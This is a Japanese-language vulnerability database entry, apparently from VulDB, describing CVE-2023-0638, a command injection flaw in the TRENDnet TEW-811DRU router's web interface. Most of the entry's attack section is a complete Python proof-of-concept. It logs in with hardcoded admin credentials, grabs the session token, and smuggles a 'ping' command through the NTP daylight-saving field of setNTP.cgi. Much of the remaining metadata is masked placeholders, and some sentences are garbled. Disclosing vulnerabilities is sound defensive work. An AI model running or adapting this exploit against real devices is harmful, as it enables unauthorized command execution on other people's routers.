CVSS 一時的なメタスコア	現在のエクスプロイト価格 (≈)	CTI注目指数
6.5	$0-$5k	0.05

脆弱性が TRENDnet TEW-811DRU 1.0.10.0 内に見つかりました。この脆弱性は 重大 として分類されました。 この脆弱性により影響を受けるのは、コンポーネント【Web Interface】の未知の機能です。 未知の値で改ざんすることが、 特権昇格を突く攻撃に繋がります。 この問題をCWEでは、CWE-77 と定義しました。 この脆弱性は 2023年02月02日ににて 紹介されました。

この脆弱性は CVE-2023-0638 として知られています。 攻撃はリモートで開始される可能性が高いです。 入手できる技術的詳細情報はありません。 さらに、入手できるエクスプロイトツールが存在します。 エクスプロイトツールは一般に公開されており、悪用される可能性があります。 現時点で、エクスプロイトツールの価格はおそらく米ドルで約$0-$5kです。 MITRE ATT&CKプロジェクトは、この問題に対して攻撃手法 T1202 を使用しました。

このエクスプロイトツールは proof-of-concept として宣言されています。 エクスプロイトツールは vuldb.com からダウンロードできます。 0dayとして、推定される闇市場取引価格はおよそ $0-$5k でした。 エクスプロイトツールには下記のコードが含まれています。

import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'ZYWN7T47'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.102'
request = {'HEAD': 
{'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Content-Length': '555', 
'Origin': 'http://0.0.0.0:8081', 
#'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/adm/time.asp', 
'Cookie': 'expandable=5c', 
'Upgrade-Insecure-Requests': '1'}, 
'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 
'DSTenable': 'on',
'NtpDstEnable': 1, 
'NtpDstOffset': -7200, 
'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 
'tz_daylight_start_day_select': 1, 
'tz_daylight_start_time_select': 2, 
'NtpDstEnd': 100102, 
'tz_daylight_end_month_select': 384968387, 
'tz_daylight_end_day_select': 1, 
'tz_daylight_end_time_select': 2, 
'enableNTP': 1, 
'ntp_server': 1, 
'NTPServerIP': 'pool.ntp.org',
'time_zone': 'UCT_-11', 
'timer_interval': 16776915, 
'manual_year_select': 2012, 
'manual_month_select': 'abcd', 
'manual_day_select': 'abcd', 
'manual_min_select': -38, 
'manual_sec_select': "abcd", 
'timeTag': 'dummy',
'range.func': '/.../.../.../.../.../.../.../.../.../.../', 
'DNSServerGuest': ''}, 
'ATTR': 
{'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 
'METHOD': 'POST', 
'VERSION': 'HTTP/1.1'}
}
headers = request['HEAD']
params = request['PARAM']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
login_header = {'Host': '0.0.0.0:8081', 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 
'Accept': '/', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Connection': 'keep-alive', 
'Referer': 'http://0.0.0.0:8081/login.asp', 
'Cookie': 'expandable=4c'}
login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip)
probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip)
loop = 3
r = None
while loop>0:
  try:
    loop -= 1
    r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5)
    if r.status_code != 200:
      continue
    r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5)
    pat = r'name="token" value="(.*?)"'
    token_value = re.findall(pat,r.text)
    if len(token_value)>0:
      params['token'] = token_value[0]
      print('new_token:{}'.format(token_value[0]))
      break
  except Exception as e:
    time.sleep((3-loop)*3)
    print('error:{}'.format(e))

try:
  r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5)
except:
  pass

】のプラグインを提供しています。

考えられる回避策が、前として脆弱性の公開後公表されました 。

製品情報

ベンダー

• TRENDnet

名前

• TEW-811DRU

バージョン

• 1.0.10.0

ライセンス

• commercial

CPE 2.3情報

• 🔍

CPE 2.2情報

• 🔍

CVSSv4情報

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB 方向性: 🔍
VulDB 信頼性: 🔍

CVSSv3情報

VulDB ベースメタスコア: 7.2
VulDB 一時的なメタスコア: 6.5

VulDB ベーススコア: 7.2
VulDB 一時的なスコア: 6.5
VulDB 方向性: 🔍
VulDB 信頼性: 🔍

CVSSv2情報

AV	AC	Au	C	I	A
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳
💳	💳	💳	💳	💳	💳

方向性	複雑度	認証	守秘義務性	誠実性	可用性
解除	解除	解除	解除	解除	解除
解除	解除	解除	解除	解除	解除
解除	解除	解除	解除	解除	解除

VulDB ベーススコア: 🔍
VulDB 一時的なスコア: 🔍
VulDB 信頼性: 🔍

悪用する情報

クラス: 特権昇格
CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

ローカル: いいえ
リモート: はい

可用性: 🔍
アクセス: パブリック
ステータス: Proof-of-Concept
プログラミング言語: 🔍
ダウンロード: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

価格予測: 🔍
現在の価格評価: 🔍

0-Day	解除	解除	解除	解除
本日	解除	解除	解除	解除

脅威インテリジェンス情報

関心: 🔍
アクティブ アクター: 🔍
アクティブな APT グループ: 🔍

対策情報

推奨: 既知の緩和策なし
ステータス: 🔍

0day日時: 🔍

タイムライン情報

2023年02月02日 🔍
2023年02月02日 +0 日 🔍
2023年02月02日 +0 日 🔍
2023年03月01日 +27 日 🔍

ソース情報

ステータス: 未定義

CVE: CVE-2023-0638 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

エントリ情報

作成済み: 2023年02月02日 09:09
更新済み: 2023年03月01日 16:39
変更: 2023年02月02日 09:09 (38), 2023年02月02日 09:10 (2), 2023年03月01日 16:39 (2)
完了: 🔍
提出者: leetsun

Submit情報

承諾済み

• Submit #76135: Command injection vulnerability in TRENDnet router TEW-811DRU (キーワード: leetsun)

討論

Might our Artificial Intelligence support you?

Check our Alexa App!